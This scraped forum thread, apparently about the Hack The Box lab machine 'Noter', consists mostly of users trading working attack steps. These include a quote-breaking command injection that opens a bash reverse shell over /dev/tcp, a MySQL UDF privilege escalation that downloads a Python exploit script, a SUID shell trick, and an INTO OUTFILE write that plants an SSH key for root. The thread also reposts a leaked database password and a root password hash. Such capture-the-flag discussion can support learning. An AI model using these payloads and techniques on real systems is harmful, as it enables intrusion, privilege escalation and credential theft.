Posts: 22 Threads: 0 Joined: N/A (May 9, 2022, 04:47 AM)NoobHTB Wrote: (May 9, 2022, 01:08 AM)Exited3n Wrote: (May 9, 2022, 01:06 AM)unlawz Wrote: (May 9, 2022, 12:01 AM)Exited3n Wrote: (May 8, 2022, 10:01 PM)unlawz Wrote: nudge root?
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
Yes, but I don't know how to approach it. I don't understand what I have to do
mysql -u root -p
use mysql;
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit (exploit-db.com)
I tried this, and it failed. Anyone can help me? Thanks in advance.
create function do_system returns integer soname 'raptor_udf2.so';
if you search correctly you will find a python version of that exploit Posts: 43 Threads: 0 Joined: N/A (May 9, 2022, 04:54 AM)iphonedox Wrote: (May 9, 2022, 04:47 AM)NoobHTB Wrote: (May 9, 2022, 01:08 AM)Exited3n Wrote: (May 9, 2022, 01:06 AM)unlawz Wrote: (May 9, 2022, 12:01 AM)Exited3n Wrote: # Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
Yes, but I don't know how to approach it. I don't understand what I have to do
mysql -u root -p
use mysql;
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit (exploit-db.com)
I tried this, and it failed. Anyone can help me? Thanks in advance.
create function do_system returns integer soname 'raptor_udf2.so';
if you search correctly you will find a python version of that exploit You can use this python scriptPosts: 51 Threads: 0 Joined: N/A For root, download the python script https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
python udf_root.py --username root --password Nildogg36
./sh -p
and then we have a sh file u+s, run this to get root Thanks to @ iphonedox for the hint. cat /etc/passwd root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7::: Posts: 213 Threads: 0 Joined: N/A Here is another way to get root: select "YOUR PUBLIC KEY" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '
';
Posts: 51 Threads: 0 Joined: N/A Writeup: HTB: Noter – Syn's writeups (synisl33t.com)Password: root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7:::
I can't root if I haven't the hint from guys. Thanks for helping me. (P/S: sorry for bad English) Posts: 213 Threads: 0 Joined: N/A (May 9, 2022, 07:39 AM)jon01 Wrote: (May 9, 2022, 07:24 AM)Exa Wrote: Here is another way to get root:
select "YOUR PUBLIC KEY" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '
';
can any tell me how did we find this exploit ? dnt know : as a user we can dump databases : is this why Did you find the MySQL root credentials in app.py? Posts: 21 Threads: 0 Joined: N/A (May 8, 2022, 06:49 PM)Exa Wrote: (May 8, 2022, 06:40 PM)hackerman Wrote: (May 8, 2022, 06:37 PM)Exa Wrote: So I think I got code execution. My test.md file contains:
a'; sleep 10; echo 'a
nice find, the ' breaks apart $' '
Able to get shell with this
So with this I get a reverse shell:
a'; bash -i >& /dev/tcp/10.10.xxx.xxx/4000 0>&1; echo 'a
svc@noter:~/app/web$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@noter:~/app/web$ cat /home/svc/user.txt
Okay, so the MySQL credentials from app_backup_1635803546.zip can be used to connect to port 3306.
Anything interesting there? I get "bash: cannot set terminal process group (1245): Inappropriate ioctl for device" 400 - when going for reverse shell. There is interaction but I can't get the shell, any advice? Posts: 17 Threads: 0 Joined: N/A (May 8, 2022, 08:57 AM)jon01 Wrote: (May 8, 2022, 01:16 AM)xslsystem Wrote: (May 8, 2022, 12:13 AM)Peter Wrote: xss
in username field
and password field
I dont understand how can find xss :(
I found some XSS in ckeditor but the cookie is block
PLAY WITH COOKIE Thanks Posts: 5 Threads: 0 Joined: N/A (May 9, 2022, 04:47 AM)NoobHTB Wrote: (May 9, 2022, 01:08 AM)Exited3n Wrote: (May 9, 2022, 01:06 AM)unlawz Wrote: (May 9, 2022, 12:01 AM)Exited3n Wrote: (May 8, 2022, 10:01 PM)unlawz Wrote: nudge root?
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
Yes, but I don't know how to approach it. I don't understand what I have to do
mysql -u root -p
use mysql;
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit (exploit-db.com)
I tried this, and it failed. Anyone can help me? Thanks in advance.
create function do_system returns integer soname 'raptor_udf2.so';
(May 9, 2022, 05:49 AM)NoobHTB Wrote: For root, download the python script
https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
python udf_root.py --username root --password Nildogg36
./sh -p
and then we have a sh file u+s, run this to get root
Thanks to @iphonedox for the hint.
cat /etc/passwd
root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7::: Please can you tell me why the "-p" flag works, or what it's doing? I did everything else up to this point on my own but came to have a snoop here when running ./sh wasn't doing anything and that flag worked, so would love to know why it's necessary. :) Posts: 9 Threads: 0 Joined: N/A Hello,
for the flag user is necessary modify the code of app.py ?
Thanks |
